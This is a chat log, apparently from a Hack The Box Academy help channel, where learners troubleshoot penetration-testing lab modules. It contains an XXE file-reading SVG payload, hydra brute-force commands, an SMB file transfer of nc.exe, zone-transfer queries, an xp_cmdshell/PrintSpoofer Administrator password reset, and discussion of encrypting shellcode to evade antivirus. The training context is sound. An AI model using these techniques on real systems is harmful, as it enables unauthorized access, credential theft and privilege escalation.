open vpn connects you to the same network, so you can access the victim host you spawn. you'll need to connect to the victim box with ssh or rdp, or something like that.
oh, also ssh
ok, let me try that
and adjust your grep or strategy
note: -v is inverse grep, and matches the opposite of what you specify
so if you have a list
1
2
3
4
and do grep -v 3, it'll select lines 1, 2, and 4
i have been on this almost all afternoon, i will come back fresh tomorrow, have a great night, and tyvm for ur assist.
yup next time mention the module and section so people can better assist
can anyone give me a nudge on the file upload skill assessment. I'm not able to find where the contact/upload.php file is to read it's contents. I'm using an XXE payload. I'm able to read /etc/passwd file fine. The payload was not wrong.
||<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
<!ENTITY xxe SYSTEM "file:///var/www/html/index.php">
]>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<text font-size="16" x="0" y="16">&xxe;</text>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>'
||
I think the only time XXE is mentioned is in the Limited File Uploads section, give that a review.
hey superNuts you still there
yeah
im still on the module do I need to try a wordlist to see if another parameter works
or work with the ones they give me
what module
file inclusion
send me a dm
I dont have my notes with me, but i guess thats footprinting lab? Hard?
Rdp is open but yea wrong creds from what i remember
Footprinting Medium, I've now found the ||service account through enumerating SMB with the alex user found in nfs share|| but seems like I cannot RDP with that one either.
In the nfs? Sorry if i give false info since im speaking out of my memory but im pretty sure from nfs share you should get another user
And not alex
if your user isn't an administrator they need to be in the "Remote Desktop Users" group to rdp
Thanks, however I cannot verify that until I have a foothold, correct?
Ah sorry, yea no i was thinking of hard lab still ffs.
You typed wrong password
Into rdp. You can use single quotes
Yeah but I'm not sure if I shall use alex or sa account
if you get this kind of error it's an issue on OS level, probably access denied
nah that's a network problem
i can rdp fine with the admin though
What did you do after finding alex/sa account?
Ah now i remember.
Yea i personally went with alex (for start) before i needed higher privs
Read the msql server where the htb user is located
i'm not doing the module im just telling you the errors you might see
Why is my screenshots being deleted 
Well i know it says Sa but it maybe just means its a password for an account
Contains spoiler like a password
My bad
Can you rdp with alex?
Let me try again
If not then network problem
Make sure to put it in single quotes
Since he maybe dont like special chars
Yup single quotes did it
Soooo…
I’m in Getting Started/Attacking Your First Box/Nibbles Web Footprinting-Initial Foothold
It’s not allowing me to navigate to the nibbleblog directory.
There’s no way to complete the module.
All the pwnbox regions show high latency. Internet is working fine. Am I the only one facing the issue?
does it change on reload
I did.
It improved a little. But still it is very slow, and when I type in commands, they take forever to appear on the screen 😦
the NA vpns have been down last few weeks. switch to EU 2
by not being able to reach it do you mean the site gets stuck loading forever or is there some error?
Visiting it? I mean from what i see you get same error as in the writeup?
Will try this
mine are fine
Loads forever.
try lowering the mtu to 1250 for tun0
"mine are fine" your ping is over 170 for all of them 😭 💀
No, in the writeup it says the “full” address is [200 OK]
i'm doing the sigma rules module which have a lot of rdp too :))))
Then try and add / at the end but id be surprised if that's the cause
Ah im blind
I did.
It won’t load the site.
You already did, it was at the end
try what i said
I added the / at the end. It won’t load.
Try what else?
im not schainy
sudo ifconfig tun0 mtu 1250
Oooh wrong person. Sorry.
What does this command mean sir??
It worked.
Thanks.
makes max packet size smaller
dont know how it works on a lower level but i learnt this during offsec course
Wow…
Offsec, to get the OSCP?
yup i failed it
the "getting stuck loading forever" always troubleshoot mtu first
Ahhh, better luck next time.
You have any HTB certs yet?
I’ll try to remember that tip.
I feel I shouldn’t have had to do that though, like they should fix it.
Hopefully I can complete the whole module now.
i only have gcih and i'm using htb academy to get exposure to things that weren't taught to me like sigma rules
Have fun
Right on… 😎
Greetings gents.
Module: Password Attacks > Password Attacks Lab - Easy
Confused as to how I should proceed with this lab. Attempting to brute force the SSH service with crackmapexec and the lab is either timing out after taking so long or im getting no hits when I try to use brute force this. I've tried bruteforcing root account using mutated password list and password list from the module as well as rockyou.txt and im getting no hits. Using the provided username list causes the target to time out and despawn before I can complete it.
What am I doing wrong here?
ssh is super slow to brute, try another service
Hi, could someone give me a time estimate on how long it should take to crack the password for Password Attacks: Password Mutations?
I'll try FTP, ty
Did you work it out in the end?
I've been using pwnbox.
I used this command to generate the mutated list:
||```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
```||
And then I ran this command to crack the password:
||```
hydra -l sam -P mut_password.list ssh://10.129.202.64
```||
It's been 40+ minutes...
Getting this when I try to use crackmapexec with FTP instead of SSH :C
yeah and use the username and password list in the resources
^ That was my plan if root/rockyou.txt wasnt gonna work
but uh ftp isnt happy with me
👍
oh this one. may take longer, not sure. this was a pain.
also don't brute ssh
Thanks for telling me ⚰️
The question told me to though? Or were you talking to the other guy?
both
it didn't say brute force ssh
it said log in with ssh once you have the password
Oh, which service would you recommend I brute force instead? I did a quick Nmap scan and I've got FTP and SMB available.
use ftp with 48 threads
Can anyone have free fire hack?
I looked through the man page for Hydra, couldn't find an option for threads. Does tasks = threads?
no, that's not what this discord is about
yeah tasks sorry
I know but thanks
Btw if you don't mind me asking, what are tasks in Hydra? Is it number of connections to be run in parallel?
-t (tasks) specifies the number of parallel tasks, like the concurrent sessions it will establish
how many it runs at the same time
Is there a way to know how many parallel tasks your machine can handle?
its more how many the ftp server can handle not your machine
for htb modules 48 is the sweet spot
64 will dos the server
I am able to navigate to the directories in the browser, but I can't curl them, and the gobuster attack doesn't work.
Weird.
I see. Thanks for your help.
Is curl stuck forever?
No, just sends a little “not found” html page in the terminal.
then what's on the browser
Same as the example in the module.
Info about the blog.
I'm not sure which part this is
Getting Started > Attacking Your First Box > Nibbles Web Footprinting
Module Example:
My browser:
My terminal:
you spelled nibble wrong
Shit… 😅
Thanks again.
because that address isn't real; it doesn't exist; you don't have access to it
scroll all the way down
there's a "spawn target" button
oh wait
is he trying to connect his own host to the vm
yes
and also that's not how copy works
see the task bar
that powershell console is on host
oh brother
if you look above that they were trying to 1::1 the section
well good thing the connection failed if not he would've leaked his own ntlmv2 hash
I'm trying this on my pc
you also don't know how shares work
copy \\ip\share\file . will copy the file to your current directory
why try this on your pc when they literally gave you a target to use?
^
even if you got the path right, nc.exe will 100% get marked by defender
I imagine I am in the real world
I wanted to see if AV would stop me
Okay thx 😊
depending what you're doing yes
Xre0uS point is, it's generally not smart to test on your host
you can enable defender on the target since you have admin privs
brother you didn't even get the copy command right
and functionally do the same thing
Can someone please share their code for the AES crypter at the start of windows evasion?
Not on my host. On another virtual machine
doesn't look like another VM to me
as it looks like the PowerShell console is running on your host
as it's above the chrome and other vm window
unless you're telling me you went turtles all the way down, which I doubt given the current conversation
you are right
I will try again
no, figure out yourself :) (that's the point, unless it's just given by the module -- in that case read
I have tried lots of different ways I think it’s in what I’m doing with cyber chef and one of those “you don’t know until you know” things
Ticking the right box on the right form, and not a matter of not learning or reading. So it’s easier if I can just know where I went wrong in the procedure
The code is given by the module, too, i think it’s how much of the shellcode generated is included in the encrypted data, whether the variable declaration is in it (and which parts?) or its pure shellcode
where did you get the original meterpreter shellcode from? did you test that it works
also it's better to describe what issue you're facing instead of just asking for code
not work
brother
what
you missed an important thing
??
the sharename
you just did \\ip\file
it's \\ip\share\file
it "not work" because you didn't do it right
wait
weird it's reading the . as part of the filename
try ./ and see if that changes it
or ./file.xt
learn to read errors
haha object not found bro
worst case you'd have to specify the full filepath
and look above as it's highlighting the whole line
including the .
look
you can also do copy /? to see it's syntax
The device connects but there is no file
try specifying the full path
like C:/Windows/Temp
you can also try net use x: \\ip\share\ and navigate to X:
why is your syntax 'sudo impacket-smbserver share . -smb2support' when the example says 'sudo impacket-smbserver share -smb2support'
no it's not
Look at the impacket smb server setup pic
sudo impacket-smbserver [sharename] [file location] -smb2support
look
marcie
VPN IP
look at the smbserver screenshot
not vpn my host
there is a . between share and -smb2
actually to correct
it's sudo impacket-smbserver [sharename] -smb2support [filelocation]
it looks like it created it weirdly
¯\_(ツ)_/¯
I'm pretty confident in what I can see
filelocation ?? how
so am i
in att or vic
brother
i'll give you one attempt to critically think about the command i shared
and tell me if you think it should be on the att or vic machine
ok still not work
¯\_(ツ)_/¯
sudo impacket-smbserver share -smb2support /tmp/smbshare
like HTB
could just be that windows doesn't like it
Msfvenom lol, where do you get yours???
could be your msfvenom command was wrong
For real, you’re going to hit me with that “have you tried turning it on and off again?”
lol
Can I ask have you done this bit?
Coz my question could be direct. Do I include the variable declaration in the encryption I feed to cyberchef or just the shellcode?
no idea brother, yes i haven't done this bit. and @next bronze point was did you try it
as in are you sure it works before trying to dig into it
Ok I’ll look into it
if it doesn't work, then the point is moot
i mean you can try with and without throwing the variable dec into cyberchef
no just the shellcode
but afaik cyberchef just does decoding
yes
no need to be crazy with it
cyberchef only encrypts/decypts, it doesn't write the var for you
Can I see your recipe on cyberchef ? To cross check Against mine
how i can send photo on chat i got stuck in footprinting module
it will be the same as the module, it has worked for them
Hmmm ok. No worries. Thanks for your time!
read and follow #welcome you can also describe where you're 'stuck'
I write my own encryptor/decryptor in C using bcrypt
my guy, just try to make it yourself, maldev is frustrating, I get it, but figuring it out yourself based on what's in the module is more fun
Haha just about the time saving. It’s a new concept for me. I’m fine with hearing the answer and making my way from there
i am sure i did it but there some stubbed problem
It's the age of ChatGPT. If you think hearing the answer is cheating, you're in the Bronze Age
?
it defeats the purpose of learning
Post humanity bro, save your tears. The singularity is coming
if you just want the answers then pay for an annual sub
Identify if it's possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...})
There is zero difference between reading a book and being told what the book meant
subdomains exist and one is a zone that can be transferred to
dig txt subdomain.inlanefreight.htb @target_ip
there's a generous leap of logic between those two
i did it
as one requires critical thinking
you can also try dig axfr subdomain.inlanefreight.htb @target_ip
Let’s assume critical thinking is a certainty. There’s no difference
you should be able to arrive at conclusions on your own, without being told
and this also did it
well if you used the right internal subdomain, then it should work
step 1; dig axfr inlanefreight.htb @target_ip
step 2; just try different subdomains until it works
it worked and i found the answer
but when i submit it it does not
you sound like the kind of person that would buy exam answers
no quotes
the answer would be the HTB{..}
😂
yes i know
Ha ha! If I bought Exam answers I wouldn’t be here asking for your time
as I said though most modules have a writeup that's accessible via having an annual sub
and as @next bronze said, it looks like the provided cyberchef recipe should work
provided that your shellcode is correct at least
Yes I’ll be sure to check my spelling. Ciao Miao amigo
I have been using that writeup feature, do you know if it will disappear once my annual sub has expired?
even if I completed the module
yes
the writeup feature is a perk of the sub, not a condition of completing the module
Ow damn good to know
no sub = no feature
Module: Injection Attacks
Section: XPath Injection Prevention & Tools
The module explains the use of xcat; the flag from the previous exercise is shown with question marks (?) instead of the curly brackets ( { and } ) - is there a way to properly get these characters?
It might be due to the tool you are using is not handling special characters correctly.
Do manual data exfiltration.
Yes, during manual it went fine. Was just wondering if there was any fix for the automated tool 🙂 thanks for your response!
Do they mean here that payloads encoded with SGN are not universally detectable or that they are universally detectable? im a bit confused
Got it, thanks!
Is there a linux equivalent of the "Windows Event Logs & Finding Evil" module in the HTB Academy?
not afaik
as a lot of attacks go after Windows devices, and domain joined instances, there's not a big focus on linux def
Heya, how would I import an id_rsa file I just cracked so I can authenticate to a service that only allows authentication via a key?
Working on the Password Attacks > Password Attacks Lab - Easy for reference
download the file
chmod to x00 where x is any octal perms for owner
the important bit is removing perms from other users
ssh -i id_rsa <username>@<server/ip>
How would I check what perms are on the id_rsa file so I know what to remove? and what is the command for removing a perm from another user?
i just walked you through the basics
chmod ### file where each # is an octal permission that is either one or a combination (addition) based off of
4 - read
2 - write
1 - execute
0 = no perms
ah right, I misunderstood what you were saying 🙂
alternatively
there's the letter codes
i don't recall those
as i more frequently use octal, as it's just faster
ls -la can show file perms
0--------- (the leading 0 just means it's a file, a leading d is directory)
each octal represents a different group type
owner
group
other
--- | --- | ---
rwx | --- | --- = 700
rwx | rwx | rwx = 777
(sticky bits get a tiny bit complicated, but you don't generally have to worry about that)
All I know about chmod perms is that 777 means full access and 700 means read only, never actually understood how it works
but ty, this is insightful
read/write/execute only for the owner
as users have two ids; UID and GID/ userID and GroupID
UserID is who you are
GroupID is what group you belong to, such as root/admin/backup_operators
Thats good to know
the only thing ssh cares about is that the user using the file is the owner and is the only one that CAN modify/read it
#modules message example here if you have incorrect permissions on the file
(yes it uses 4 octals, but those relate to sticky bits - and those are beyond scope)
Makes sense, wouldn't want your key to be usable by anyone
So I suppose appropriate perms would be something like 400?
I'll try that and see how I go
x00 works where x is any number between 4-7 afaik should work idk if it works for any number 1-7
as long as the other sets are 0, it's happy
any advice pls on nmap module q: Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.
-p-
-sT -p-
--top-ports=100
going down to 26 plus the 53 port is 27, answer is wrong?
that answer is very wrong
thank you
also how are you getting the number could also be a factor in why you're getting the wrong answer
i.e. if you're just tossing it to wc -l; you're gonna get the wrong answer
still nothing w nmap -Pn -sT -p- <ip>
only nmap -Pn -sV --top-ports=26 gives back results
don't adjust ports
try adding -T4 if the scan is taking a long time
that's weird because it shouldn't
are they listed as open/closed/filtered?
yeah so for w/e reason it's also showing filtered
i believe adding --open will only show open ports
question is tcp ports, not 'open' ports
found implies open
understood
because you can generally only find open ports
well
just spun it up myself and scanned
Anyone have a second to help debug? Windows AD skills assessment part II, MSSQL xp_cmdshell privesc, windows server 2019 service user w/ SeImpersonate -> SYSTEM using PrintSpoofer. This command just hangs and never completes xp_cmdshell C:\Windows\Temp\PrintSpoofer64.exe -c "net user Administrator Welcome1"
did sudo nmap -p- -sT <ip> and it gave me the expected result
ports can be closed but still findable by RA flag w --packet-trace?
use quotes for things after xp_cmdshell
so wrap it all in single quotes
not the point
point is something is up with your target
restart it
then change vpn regions
it also helps if you share your full command, not redacted
sudo nmap -sT -p- <ip> gives host seems down
and a screenshot of your output
that's odd
the <ip> you're supplying is the one generated when you spawn target yeah?